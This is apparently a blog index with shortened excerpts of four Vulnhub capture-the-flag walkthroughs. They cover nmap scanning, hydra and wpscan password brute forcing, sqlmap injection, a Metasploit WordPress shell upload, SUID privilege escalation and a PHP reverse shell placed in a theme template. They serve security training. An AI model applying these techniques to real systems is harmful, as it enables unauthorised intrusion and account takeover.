Posts

NullByte:1 - Walkthrough [Vulnhub]

Here's my solution for NullByte:1. The machine can be downloaded from here. Nmap: scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.142 We find 4 ports open. Enumeration: browsing the web and checking the source did not reveal any hint, but we observe there is an image, so let's download it and check whether it contains any information. $ wget http://192.168.1.142/main.gif $ exiftool main.gif $ strings main.gif We find kzMb5nVYJw as a hint, which is a directory. Browsing http://192.168.1.142/kzMb5nVYJw/ and checking the source gives us the hint that the key is simple. Using hydra to brute force it: $ hydra -P /usr/share/wordlists/rockyou.txt 192.168.1.142 http-form-post "/kzMb5nVYJw/:key=^PASS^:invalid key" -la We get the password: elite. After entering the key, we land on /kzMb5nVYJw/index.php. Here we enter a random name, root, and observe the URL: the parameter usrtosearch= is vulnerable to SQL injection. We use sqlmap to enumerate the databases. $...

EVM:1 - Walkthrough [Vulnhub]

Here's my solution for EVM:1. The machine can be downloaded from here. Nmap: scanning for all open TCP ports. nmap -sC -sV -p- 192.168.1.107 We find 6 ports open. Directory scanning: browsing the web gives us the hint /wordpress. Using dirb for directory scanning (dirb takes the URL as its first argument; -r disables recursion): dirb http://192.168.1.107 -r Dirb also finds the /wordpress directory, so we can guess the site is built on the WordPress CMS. Using wpscan to find all plugins and users: wpscan --url http://192.168.1.107/wordpress -e ap,u No plugins were found, but we found a user: c0rrupt3d_brain. Let's brute force the password for the found user. wpscan --url http://192.168.1.107/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt We find the password: 24992499. Getting Access: as we have the credentials User: c0rrupt3d_brain Password: 24992499, we use Metasploit to get initial access. sudo msfconsole use exploit/unix/webapp/wp_admin_shell_upload We set the required details and then r...

InfoSec Prep:OSCP - Walkthrough [Vulnhub]

Here's my solution for InfoSec Prep: OSCP. The machine can be downloaded from here. Nmap: let's start by scanning for all TCP ports. nmap -sC -sV -p- 192.168.1.109 We find 3 open ports. Directory Scan: browsing the web and reading the post by admin gives the hint that there is only one user on this box, "oscp". Using dirb to scan for directories: dirb http://192.168.1.109 -r Checking /robots.txt shows a file, secret.txt, which contains a base64-encoded SSH key for the user oscp. Using CyberChef to decode the base64-encoded SSH key, copy the output and save it. Getting Access: before connecting over SSH, we change the file permissions of the key file. chmod 600 key ssh -i key oscp@192.168.1.109 Privilege Escalation: we check for SUID binaries (the -perm flag was missing in the original command). find / -perm -u=s -type f 2>/dev/null Executing bash -p. The Flag

Sunset:Midnight - Walkthrough [Vulnhub]

Here's my solution for Sunset:Midnight. The machine can be downloaded from here. Nmap: scanning for all TCP ports. nmap -sC -sV -p- 192.168.1.107 We find 3 open ports. Enumeration: let's map the IP to the hostname sunset-midnight in the /etc/hosts file. Browsing the web and checking the source did not give us any hint, but we find that the site is built on the WordPress CMS. Brute forcing MySQL on port 3306, we get the password: robert. Accessing MySQL: on our machine, we create the password admin; on the target machine, we change the password for the user admin. Now we have the credentials User: admin Password: admin. We browse the /wp-login.php page and log in as admin. Navigate to Appearance > Theme Editor, and select the theme Twenty Nineteen. We select the 404 Template to place our PHP reverse shell payload. Getting Access: to run the exploit we browse http://sunset-midnight/wp-content/themes/twentynineteen/404.php while on the other side we start the netcat listener. We have a reverse sh...